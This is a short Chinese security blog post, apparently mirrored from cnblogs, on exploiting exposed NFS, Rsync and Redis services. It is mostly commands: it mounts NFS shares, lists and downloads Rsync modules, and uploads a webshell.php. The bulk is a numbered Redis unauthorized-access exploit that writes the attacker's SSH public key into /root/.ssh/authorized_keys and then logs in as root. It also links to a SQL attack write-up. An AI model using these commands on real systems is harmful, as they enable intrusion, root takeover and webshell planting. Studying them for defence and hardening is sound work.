zoukankan      html  css  js  c++  java
  • 常见漏洞

    NFS漏洞:(Network File System 即网络文件系统NFS 默认工作在2049端口)

    目录列举:

    方法1:

    nmap -script=nfs-ls.nse 127.0.0.1

    方法2. 

    挂载到本地

     mount -t nfs 192.168.0.1:/export/home  /tmp/badperms

     为了mount一个NFS共享需要首先在本地系统上创建一个目录,切换目录到/tmp/badperms然后你会看到位于IP地址为192.168.0.1上的export/home目录的内容。

    Rsync  (linux下的文件同步服务,默认工作在873端口,centos6.3上已经默认安装)

    目录列举

    方法1:

    nmap -script=rsync-list-modules 127.0.0.1

    方法2. 

     列举整个同步目录或指定目录:

       rsync 10.0.0.12::

       rsync 10.0.0.12::www/

    下载文件或目录到本地:

       rsync -avz 10.0.0.12::www/test.php /root

       rsync -avz 10.0.0.12::www//var/tmp

    上传本地文件到服务端:

      rsync -avz webshell.php 10.0.0.12::www/

    Redis 未授权访问缺陷可轻易导致系统被黑

     1 $ssh-keygen -t rsa //本地产生公私钥文件
     2 $(echo -e "
    
    " ;cat id_rsa.pub;echo -e "
    
    ") >  foo.txt //将公钥写入foo.txt文件
     3 $cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
     4 $redis-cli -h 192.168.1.11
     5 $ 192.168.1.11:6379> config set dir /root/.ssh/
     6 OK
     7 $ 192.168.1.11:6379> config get dir
     8 1) "dir"
     9 2) "/root/.ssh"
    10 $ 192.168.1.11:6379> config set dbfilename "authorized_keys"
    11 OK
    12 $ 192.168.1.11:6379> save
    13 OK

    这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:

    $ ssh –i  id_rsa root@192.168.1.11

    即可远程利用自己的私钥登录该服务器。

    当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。

     

    详情请点此链接:https://www.seebug.org/vuldb/ssvid-89715

    基于约束的SQL攻击

    详情见地址:http://www.phpbug.cn/archives/639.html#more-639

  • 相关阅读:
    【leetcode】92. 反转链表 II
    【leetcode】91. 解码方法
    【leetcode】89. 格雷编码
    【leetcode】86. 分隔链表
    【leetcode】82. 删除排序链表中的重复元素 II
    为什么选择react
    React 全家桶实现后台管理界面
    前后端同构
    浅谈React前后端同构防止重复渲染
    由React引发的前后端分离架构的思考
  • 原文地址:https://www.cnblogs.com/tr1ple/p/6105146.html
Copyright © 2011-2022 走看看